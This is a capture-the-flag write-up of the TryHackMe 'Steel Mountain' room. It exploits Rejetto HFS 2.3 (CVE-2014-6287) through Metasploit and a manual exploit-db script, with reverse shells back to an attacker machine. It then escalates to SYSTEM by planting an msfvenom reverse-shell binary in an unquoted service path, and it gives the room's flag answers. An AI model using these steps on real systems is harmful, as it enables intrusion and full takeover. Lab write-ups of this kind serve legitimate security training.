TryHackMe-Steel-Mountain

From aldeid
Jump to navigation Jump to search

Steel Mountain

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

[Task 1] Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

#1 - Who is the employee of the month?

Hint: Reverse image search

$ curl -s http://10.10.97.217/ --output index.html
$ cat index.html 
��<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Steel Mountain</title>
<style>
* {font-family: Arial;}
</style>
</head>
<body><center>
<a href="index.html"><img src="/img/logo.png" style="width:500px;height:300px;"/></a>
<h3>Employee of the month</h3>
<img src="/img/BillHarper.png" style="width:200px;height:200px;"/>
</center>
</body>
</html> 

The page displays a picture named BillHarper.png

Answer: Bill Harper

[Task 2] Initial Access

Now you have deployed the machine, lets get an initial shell!

#1 - Scan the machine with nmap. What is the other port running a web server on?

PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: STEELMOUNTAIN
|   NetBIOS_Domain_Name: STEELMOUNTAIN
|   NetBIOS_Computer_Name: STEELMOUNTAIN
|   DNS_Domain_Name: steelmountain
|   DNS_Computer_Name: steelmountain
|   Product_Version: 6.3.9600
|_  System_Time: 2020-06-05T15:20:38+00:00
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2020-06-04T15:15:51
|_Not valid after:  2020-12-04T15:15:51
|_ssl-date: 2020-06-05T15:20:52+00:00; 0s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49161/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:17:95:c4:ed:a0 (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-05T15:20:38
|_  start_date: 2020-06-05T15:15:45

Another web service is running on port 8080.

#2 - Take a look at the other web server. What file server is running?

When we connect to http://10.10.97.217:8080, we can see a webpage which name is HFS. There is a link at the bottom of the page that redirects to http://www.rejetto.com/hfs/.

Answer: rejetto http file server

#3 - What is the CVE number to exploit this file server?

Hint: https://www.exploit-db.com/

The version install is 2.3. Let’s find vulnerabilities affecting Rejetto HFS file server 2.3. We land to https://www.exploit-db.com/exploits/39161 (CVE-2014-6287)

Answer: 2014-6287

#4 - Use Metasploit to get an initial shell. What is the user flag?

Hint: C:\Users\bill\Desktop

Let’s search for the exploit:

$ msfconsole -q
msf5 > search cve-2014-6287

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution

Let’s select it and check the required options:

msf5 > use 0
msf5 exploit(windows/http/rejetto_hfs_exec) > show options 

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.160.32     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    10.8.50.72       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    5555             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic

We need to set the IP and port for both the target and our attacking machine:

msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.160.32
RHOSTS => 10.10.160.32
msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.8.50.72
SRVHOST => 10.8.50.72
msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 5555
SRVPORT => 5555

Now, start the exploit:

msf5 exploit(windows/http/rejetto_hfs_exec) > exploit 

[*] Started reverse TCP handler on 10.8.50.72:4444 
[*] Using URL: http://10.8.50.72:5555/nlXmp52ty62IBtr
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /nlXmp52ty62IBtr
[*] Sending stage (176195 bytes) to 10.10.160.32
[*] Meterpreter session 1 opened (10.8.50.72:4444 -> 10.10.160.32:59836) at 2020-06-06 06:32:48 +0200
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\LJHvbhrX.vbs' on the target
[!] Tried to delete %TEMP%\LJHvbhrX.vbs, unknown result

meterpreter > 

Success! We now have a meterpreter. Let’s get the flag.

meterpreter > cd c:/users/bill/desktop
meterpreter > ls
Listing: c:\users\bill\desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-09-27 13:07:07 +0200  desktop.ini
100666/rw-rw-rw-  70    fil   2019-09-27 14:42:38 +0200  user.txt

meterpreter > cat user.txt
b04763b6fcf51fcd7c13abc7db4fd365

Answer: b04763b6fcf51fcd7c13abc7db4fd365

[Task 3] Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!

#1

Instructions

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities - “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:

Answer

First download PowerUp.ps1:

$ wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

Then in your meterpreter session:

meterpreter > pwd
c:\users\bill\desktop
meterpreter > upload /data/documents/challenges/TryHackMe/Steel_Mountain/files/PowerUp.ps1
[*] uploading  : /data/documents/challenges/TryHackMe/Steel_Mountain/files/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 483.26 KiB of 483.26 KiB (100.0%): /data/documents/challenges/TryHackMe/Steel_Mountain/files/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded   : /data/documents/challenges/TryHackMe/Steel_Mountain/files/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell 
Loading extension powershell...Success.
meterpreter > powershell_shell 
PS > ls


    Directory: C:\users\bill\desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          6/5/2020   9:34 PM     494860 PowerUp.ps1
-a---         9/27/2019   5:42 AM         70 user.txt

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

ServiceName   : AdvancedSystemCareService9
Path          : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AdvancedSystemCareService9' -Path <HijackPath>

ServiceName   : AWSLiteAgent
Path          : C:\Program Files\Amazon\XenTools\LiteAgent.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AWSLiteAgent' -Path <HijackPath>

ServiceName   : IObitUnSvr
Path          : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'IObitUnSvr' -Path <HijackPath>

ServiceName   : LiveUpdateSvc
Path          : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'LiveUpdateSvc' -Path <HijackPath>

[*] Checking service executable and argument permissions...

[*] Checking service permissions...

[*] Checking %PATH% for potentially hijackable .dll locations...

HijackablePath : C:\Windows\system32\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command '...'

HijackablePath : C:\Windows\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Windows\\wlbsctrl.dll' -Command '...'

HijackablePath : C:\Windows\System32\WindowsPowerShell\v1.0\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Windows\System32\WindowsPowerShell\v1.0\\wlbsctrl.dll' -Command '...'

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for vulnerable registry autoruns and configs...

[*] Checking for vulnerable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

PS >

#2

Instructions

Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

Answer

Answer: AdvancedSystemCareService9

#3

Instructions

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Use msfvenom to generate a reverse shell as an Windows executable.

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

Answer

The following service has an unquoted path that we will exploit. If we generate an executable which name is Advanced.exe, we may be able to abuse the service and start it with our own executable.

ServiceName   : AdvancedSystemCareService9
Path          : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'AdvancedSystemCareService9' -Path <HijackPath>

Let’s generate a reverse shell with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.50.72 LPORT=4443 -f exe -o Advanced.exe

Now, let’s upload our executable:

PS> ^Z
Background channel 4? [y/N]  y
meterpreter > cd "C:\Program Files (x86)\IObit"
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================

Mode             Size   Type  Last modified              Name
----             ----   ----  -------------              ----
40777/rwxrwxrwx  32768  dir   2019-09-26 17:17:30 +0200  Advanced SystemCare
40777/rwxrwxrwx  16384  dir   2019-09-26 17:17:48 +0200  IObit Uninstaller
40777/rwxrwxrwx  4096   dir   2019-09-26 17:17:46 +0200  LiveUpdate

meterpreter > upload /data/documents/challenges/TryHackMe/Steel_Mountain/files/Advanced.exe
[*] uploading  : /data/documents/challenges/TryHackMe/Steel_Mountain/files/Advanced.exe -> Advanced.exe
[*] Uploaded 72.07 KiB of 72.07 KiB (100.0%): /data/documents/challenges/TryHackMe/Steel_Mountain/files/Advanced.exe -> Advanced.exe
[*] uploaded   : /data/documents/challenges/TryHackMe/Steel_Mountain/files/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   32768  dir   2019-09-26 17:17:30 +0200  Advanced SystemCare
100777/rwxrwxrwx  73802  fil   2020-06-05 23:03:15 +0200  Advanced.exe
40777/rwxrwxrwx   16384  dir   2019-09-26 17:17:48 +0200  IObit Uninstaller
40777/rwxrwxrwx   4096   dir   2019-09-26 17:17:46 +0200  LiveUpdate

Now, let’s start a handler as a background job (press ENTER to background the job once you see Started reverse TCP handler):

meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.8.50.72
LHOST => 10.8.50.72
msf5 exploit(multi/handler) > set LPORT 4443
LPORT => 4443
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.8.50.72:4443 
msf5 exploit(multi/handler) > 

msf5 exploit(multi/handler) > jobs 

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.8.50.72:4443

Now, let’s reconnect to our previous session to restart the service.

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                         Connection
  --  ----  ----                     -----------                         ----------
  1         meterpreter x86/windows  STEELMOUNTAIN\bill @ STEELMOUNTAIN  10.8.50.72:4444 -> 10.10.160.32:59836 (10.10.160.32)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 3224 created.
Channel 6 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

[*] Sending stage (176195 bytes) to 10.10.160.32
sc start AdvancedSystemCareService9
[*] Meterpreter session 2 opened (10.8.50.72:4443 -> 10.10.160.32:59859) at 2020-06-06 06:40:24 +0200

^Z
Background channel 6? [y/N]  y

From here you have about 30 seconds to execute all the commands (background the current session, connect to the elevated new session, and get the flag). After this delay, the elevated session is closed, the handler is stopped and you’ll need to kill your session, restart the handler, reconnect to the initial session, get a shell, and restart the service. I had to do it a couple of times before I could complete all the commands and get the flag.

We see that a new session has been created with NT AUTHORITY\SYSTEM privileges. Let’s connect to it and get the flag.

^Z
Background channel 6? [y/N]  y
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  STEELMOUNTAIN\bill @ STEELMOUNTAIN   10.8.50.72:4444 -> 10.10.160.32:59836 (10.10.160.32)
  6         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ STEELMOUNTAIN  10.8.50.72:4443 -> 10.10.160.32:59883 (10.10.160.32)

msf5 exploit(multi/handler) > sessions 8
[*] Starting interaction with 8...

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > cd c:/users/administrator/desktop
meterpreter > cat root.txt
9af5f314f57607c00fd09803a587db80
meterpreter > 
meterpreter > 
[*] 10.10.160.32 - Meterpreter session 8 closed.  Reason: Died

#4 - What is the root flag?

Hint: To restart a service in Windows use the following command: sc start <service path name from question 2>

Answer: 9af5f314f57607c00fd09803a587db80

[Task 4] Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to

#1

Instructions

To begin we shall be using the same CVE. However, this time let’s use this exploit.

Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Solution

Download: * nc.exe from https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip (unzip) * the exploit from https://www.exploit-db.com/download/39161 (rename it exploit.py and edit it to replace your IP)

Now, start a handler on port 443 (you’ll need to be root)

unknown@kali:/data/tmp$ sudo rlwrap nc -nlvp 443
listening on [any] 443 ...

Start your web server on port 80 (as root):

unknown@kali:/data/tmp$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Run the exploit.

unknown@kali:/data/tmp$ python exploit.py 10.10.247.243 8080

You should see connections to your python web server, and get a shell in your handler.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>cd c:\users\bill\desktop
cd c:\users\bill\desktop

c:\Users\bill\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of c:\Users\bill\Desktop

09/27/2019  09:08 AM    <DIR>          .
09/27/2019  09:08 AM    <DIR>          ..
09/27/2019  05:42 AM                70 user.txt
               1 File(s)             70 bytes
               2 Dir(s)  44,131,753,984 bytes free

c:\Users\bill\Desktop>more user.txt
more user.txt
b04763b6fcf51fcd7c13abc7db4fd365

c:\Users\bill\Desktop>

#2

Instructions

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

What powershell -c command could we run to manually find out the service name?

Format is powershell -c ”command here"

Solution

Download WinPEAS and make it available through your python web server:

unknown@kali:/data/tmp$ wget https://raw.githubusercontent.com/carlospolop/unknown@kali:/data/tmp$ unknown@kali:/data/tmp$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Now from your reverse shell, download and execute winPEAS:

c:\Users\bill\Desktop>powershell -c "Invoke-WebRequest -Uri 'http://10.8.50.72:8000/winPEAS.bat' -OutFile 'C:\Users\bill\Desktop\winpeas.bat'"
powershell -c "Invoke-WebRequest -Uri 'http://10.8.50.72:8000/winPEAS.bat' -OutFile 'C:\Users\bill\Desktop\winpeas.bat'"

c:\Users\bill\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of c:\Users\bill\Desktop

06/05/2020  11:27 PM    <DIR>          .
06/05/2020  11:27 PM    <DIR>          ..
09/27/2019  05:42 AM                70 user.txt
06/05/2020  11:27 PM            32,976 winpeas.bat
               2 File(s)         33,046 bytes
               2 Dir(s)  44,259,053,568 bytes free

c:\Users\bill\Desktop>winpeas.bat
winpeas.bat
            *((,.,/((((((((((((((((((((/,  */               
     ,/*,..*(((((((((((((((((((((((((((((((((,           
   ,*/((((((((((((((((((/,  .*//((//**, .*((((((*       
   ((((((((((((((((* *****,,,/########## .(* ,((((((   
   (((((((((((/* ******************/####### .(. ((((((
   ((((((..******************/@@@@@/***/######* /((((((
   ,,..**********************@@@@@@@@@@(***,#### ../(((((
   , ,**********************#@@@@@#@@@@*********##((/ /((((
   ..(((##########*********/#@@@@@@@@@/*************,,..((((
   .(((################(/******/@@@@@#****************.. /((
   .((########################(/************************..*(
   .((#############################(/********************.,(
   .((##################################(/***************..(
   .((######################################(************..(
   .((######(,.***.,(###################(..***(/*********..(
  .((######*(#####((##################((######/(********..(
   .((##################(/**********(################(**...(
   .(((####################/*******(###################.((((  
   .(((((############################################/  /((
   ..(((((#########################################(..(((((.
   ....(((((#####################################( .((((((.
   ......(((((#################################( .(((((((.
   (((((((((. ,(############################(../(((((((((.
       (((((((((/,  ,####################(/..((((((((((.
             (((((((((/,.  ,*//////*,. ./(((((((((((.
                (((((((((((((((((((((((((((/"
                       by carlospolop
ECHO is off.
Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
ECHO is off.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for vulnerabilities for the OS version with the applied patches
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits

Host Name:                 STEELMOUNTAIN
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter Evaluation
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-90000-00000-AA632
Original Install Date:     9/26/2019, 7:11:06 AM
System Boot Time:          6/5/2020, 11:02:26 PM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version:              Xen 4.2.amazon, 8/24/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,048 MB
Available Physical Memory: 1,431 MB
Virtual Memory: Max Size:  2,432 MB
Virtual Memory: Available: 1,601 MB
Virtual Memory: In Use:    831 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\STEELMOUNTAIN
Hotfix(s):                 6 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB2937220
                           [04]: KB2938772
                           [05]: KB2939471
                           [06]: KB2949621
Network Card(s):           1 NIC(s) Installed.
                           [01]: AWS PV Network Device
                                 Connection Name: Ethernet 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.10.0.1
                                 IP address(es)
                                 [01]: 10.10.247.243
                                 [02]: fe80::841b:4ca5:ba80:80a3
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Caption                                     Description  HotFixID   InstalledOn  
http://support.microsoft.com/?kbid=2919355  Update       KB2919355  3/21/2014    
http://support.microsoft.com/?kbid=2919442  Update       KB2919442  3/21/2014    
http://support.microsoft.com/?kbid=2937220  Update       KB2937220  3/21/2014    
http://support.microsoft.com/?kbid=2938772  Update       KB2938772  3/21/2014    
http://support.microsoft.com/?kbid=2939471  Update       KB2939471  3/21/2014    
http://support.microsoft.com/?kbid=2949621  Hotfix       KB2949621  3/21/2014    






_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] DATE and TIME <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] You may need to adjust your local date/time to exploit some vulnerability
Fri 06/05/2020 
11:27 PM


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Audit Settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check what is being logged



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WEF Settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check where are being sent the logs
ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] LAPS installed? <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check what is being logged
ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] LSA protection? <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Active if "1"


ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Credential Guard? <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Active if "1" or "2"


ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WDigest? <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Plain-text creds in memory if "1"
ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Number of cached creds <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] You need System to extract them


ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] UAC Settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1



_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Registered Anti-Virus(AV) <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
ERROR:
Description = Invalid namespace



Checking for defender whitelisted PATHS
ERROR: The system was unable to find the specified registry key or value.


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] PS settings <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
PowerShell v2 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
    PowerShellVersion    REG_SZ    2.0

PowerShell v5 Version:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
    PowerShellVersion    REG_SZ    4.0

Transcriptions Settings:
ERROR: The system was unable to find the specified registry key or value.
Module logging settings:
ERROR: The system was unable to find the specified registry key or value.
Scriptblog logging settings:
ERROR: The system was unable to find the specified registry key or value.

PS default transcript history
The system cannot find the file specified.

Checking PS history file
The system cannot find the path specified.

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] MOUNTED DISKS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Maybe you find something interesting
Caption  
C:       




_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] ENVIRONMENT <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Interesting information?
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\bill\AppData\Roaming
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=STEELMOUNTAIN
ComSpec=C:\Windows\system32\cmd.exe
expl=no
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\bill
LOCALAPPDATA=C:\Users\bill\AppData\Local
LOGONSERVER=\\STEELMOUNTAIN
long=no
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\bill\AppData\Local\Temp\1
TMP=C:\Users\bill\AppData\Local\Temp\1
USERDOMAIN=STEELMOUNTAIN
USERDOMAIN_ROAMINGPROFILE=STEELMOUNTAIN
USERNAME=bill
USERPROFILE=C:\Users\bill
windir=C:\Windows


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] INSTALLED SOFTWARE <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Some weird software? Check for vulnerabilities in unknow software installed
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
Amazon
Common Files
Common Files
Internet Explorer
Internet Explorer
IObit
Microsoft.NET
Windows Mail
Windows Mail
Windows NT
Windows NT
WindowsPowerShell
WindowsPowerShell
    InstallLocation    REG_SZ    C:\Program Files (x86)\IObit\Advanced SystemCare\
    InstallLocation    REG_SZ    C:\Program Files (x86)\IObit\IObit Uninstaller\
    InstallLocation    REG_SZ    C:\Program Files (x86)\IObit\Advanced SystemCare\
    InstallLocation    REG_SZ    C:\Program Files (x86)\IObit\IObit Uninstaller\


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Remote Desktop Credentials Manager <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WSUS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUNNING PROCESSES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Something unexpected is running? Check for vulnerabilities
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes

Image Name                     PID Services                                    
========================= ======== ============================================
System Idle Process              0 N/A                                         
System                           4 N/A                                         
